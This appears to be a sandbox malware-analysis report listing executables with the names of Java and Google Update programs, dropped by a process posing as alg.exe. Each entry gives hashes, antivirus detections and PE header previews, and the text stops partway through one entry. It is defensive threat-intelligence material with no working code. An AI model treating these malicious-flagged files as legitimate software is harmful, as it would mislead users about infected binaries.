                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0E8A0692555C1DB02F081BB5564F57CD88C890C49C34E8DAADF86CD5718219CA5CB80DF9AF74148724DB71E50C2BCFA45243F3524A48251D28E1F537880B37A7
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@...............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.446826238256623
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:hnU/h/4KvsqjnhMgeiCl7G0nehbGZpbD:hU/VTDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9C255D0DE3E9DD4F1532F084841B07AB
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:88D319659321F63BEB51128BC71290E14637F180
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:505AF85FD6C22320D670B53F243B87A59E6663E3067FB924134A6111D8631523
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:962BA83E87A3245417A9D847EA584370391083237BD7DF11D0CF17914C76E76368A46BEBDA7F620320FD83E884F7D3AD0BA34DB379403DD4F42BFB62ABCC44BA
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@.......].......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.483752551698598
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:6x71iBLZ05jNTmJWExUsqjnhMgeiCl7G0nehbGZpbD:6xhiHIjNgwDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F2620795CE1351171CB45EA42876E333
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C8052778F85499EFEA9A20BFC08A4E483D769D28
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A8951A66EBC78361DE9B0FAE26B577507696435630F75272A131B8315475568A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7DAE049D01082948EBA85984BCBBA890C569818775BD5E8625C01A9E62A0C8C5F1080BDD8864A887FE2D1A35B8AE26A38537364AFC20BF37FF8F8489F5504829
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..................................!..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1419264
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4667218812397556
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:llnRklQ6fgJcEwixWsqjnhMgeiCl7G0nehbGZpbD:JoRfgJcEwCaDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4343FC768C07BBBBAE9A86A3E3A46633
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:48D1F0C2B915E5CDE20C44B535999B8060671E28
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:59D78B61A02A91D078CD7B57125B248C03BD6336E4B6B323ACED4330A2CDB3F8
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3F97DF76B1C0C5AB417DF7971AB4E4776E2614B12A328E6B5ABD70E961F065F1426D919796049A35446505D4D43B7D35351D727934F9BA65652F52B28AF123D7
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@.................................2.......................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1522176
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.496533219178187
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:dW25k8hb0Haw+xmsqjnhMgeiCl7G0nehbGZpbD:dWyk8SHawmqDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0F5E5D6F2894010F188BAB3F63847815
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3F91CB365C52F5272C2DFCB8E8D37C7F0A096A9C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3A69F275C20F5C353BB6B7CCA083969CCFECDD807BDC55835D6CE6A5754C6158
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AA1D0A04663A464B6F6A22AAAF7DB5D9A64C6B328BBCB758F6CC524CD6233BB1965F3DF66E915E65FE4A176191135B77350858EB7ECB6CA7910EAA7FE59D6FD5
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@....................................y..... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.163956777480587
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:fWP/aK2vB+RXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:fKCKABOsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9F3B4E8795321343A72B8157DA6106AC
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D31742CFC4E59ACC9237054A3AA7C504C1CD688B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5E92AC2B917013D3D639828AB29EEDDBBB7BD704C5DDA5595BEE6E4B7CEC72B6
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:48CAC5516256EC2D1A63C6BF595114178E5C7A3151C1F26E443842AB289842A7355C3477ECC3BB2E77FDDF4EE84EB8DC6E3A8410622AE854EDDF304489F5D665
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.................................@.......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.162036162550022
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:XO7cCNWB+09fXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:ejNWBPBsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:45CC11E0B031AED095A54F6972382E5D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DD87DDECEAEE4757DDC747C4891158C00F930273
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B9B725127EB1A49278FAC8FAA506848AF62778A5C87638B49361875C4A951F49
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE2188CCFF6BEE20C71EE8DBD1E926D1CEC188045C11BDDE202670B58B76C34D85087DB33FAD1E914E9666F23A4A746A53B0F71840B9CB509E84F1957A03EE0A
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@..........................................................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1302528
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.238928353186369
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:1ihRyhdsRrDsqjnhMgeiCl7G0nehbGZpbD:1ihsoRHDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C6789B35A529474081B22F499E9DEFE7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:227BD03B978F89B9DEC09AE688DE4A0942F96A2D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:67C7F6E0BB8C66BB4879223A61A99ADE8D1B8CD8D32B3CD9427417792D2A648C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:00360C29787A3076A423B7534F76C155B158F5A4CDA9F206DF100C31E14DB411B686FF78AA22C954F895B3AF817CAEBA636D92262E15A9CA125EA0972E02E43A
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p............ ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1342464
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.351008199686425
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:j1FDmRF+wpx/QafQsqjnhMgeiCl7G0nehbGZpbD:vmRF+wn/JfMDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6F7B7CFBB5E391D4CAD2F197004DA7AD
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3E8D80A5C32720EAF0A9A381D64EB9E1DFFFE9C1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D2FA43FBDDB115986FEB0B7DC7EEF4ED8C4BBDB09DF880DF556FDC0D9D521B41
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:18FBBAE4B173EB4797522BB41D8E9FC8AC5FC7F53FFF2FB7282DD5575B041DBD463797701827AB514774D5DC7A70D0100DA8288024912E86462197EB935AAE80
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@..................................................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.161996379298664
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:w2Ae621B+0YNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:dE21BPCsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6295C31F028705750935C43AB327C16E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:134FE31ADDDBC0F3AF79AC29B63C79DAE8584F05
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:348DED167A28F390B62506780D5915D32834FF1F1B144E94551B65144177E38D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6032ECF4088475AFCCFA1164646174AF94C5EFE543CD4C5CBFFB8EF1DCAD8A55232261E5BC67CD2FFD6B875EDF60F3FD958D5654F91AEA08EDADE1E030530A90
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@.................................I........................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2151936
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.987636737874314
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:KZkVX3lfrFfR0BecCqKBs+4o8YhAhDmg27RnWGj:KqR1frZRpcTKX4TD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C5FB93B88830D3B0FA1AF8B469FDDF03
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6AADCD5F8D5AB4C75189DEFE777B77B3AA12507F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DD09E08CBBEE2F8331815ADA585427775AAA13C29C86A8FF454338754F0196D7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4EC23FB2696BE51A5F0797F1CCED6A56FDB95471C6E2C80D2A19D893CB6F88CF7BD8631AAC88CF66A5EBEA8BA6E5A47C09AB5E87740EDE4CFD82F2A6639C463C
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4.....................@.............................@!.....t.!... ..................................................X..P...............|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc................X..............@..@.reloc.......P......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2151936
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.987636641881946
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:eZkVX3lfrFfR0BecCqKBs+4o8YhAhDmg27RnWGj:eqR1frZRpcTKX4TD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:222E5CFBDA0DA1E8CB2700CE5870BB2F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:825714A9680CC68CFDB14185FB7E726C6FBCB7D1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B22567BD4EDF17C9EF2B2E4197922870F4482E4F684E682AE28044ABF399E26F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A694E154C91886A933541B50E652F749ABDBC2697F2F19D00096FE3C94234CD464511542EA9455439CF5675CE5A29B231D642D225D21D8EDDE28F4C05B026573
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4.....................@.............................@!....... ... ..................................................X..P...............|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc................X..............@..@.reloc.......P......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1158144
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.068097121090447
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:5OXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:5OsqjnhMgeiCl7G0nehbGZpbD
